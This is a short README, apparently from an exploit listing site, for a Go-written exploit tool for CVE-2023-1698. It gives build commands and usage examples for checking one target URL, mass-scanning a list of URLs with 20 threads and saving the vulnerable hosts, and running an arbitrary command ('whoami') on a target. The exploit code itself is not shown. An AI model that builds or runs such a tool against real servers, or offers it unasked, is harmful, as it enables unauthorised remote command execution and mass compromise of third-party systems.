## https://sploitus.com/exploit?id=AFACC114-7C37-52BB-9935-261D569289C3
# CVE-2023-1698
CVE-2023-1698 exploit with golang
# how to use
```
go build CVE-2023-1698 main.go
OR
go build main.go
```
---
```
Examples:
./cve-2023-1698 -u http://target.com
./cve-2023-1698 -l urls.txt -o vulnerable.txt -t 20
./cve-2023-1698 -u http://target.com -c "whoami" -v
```
---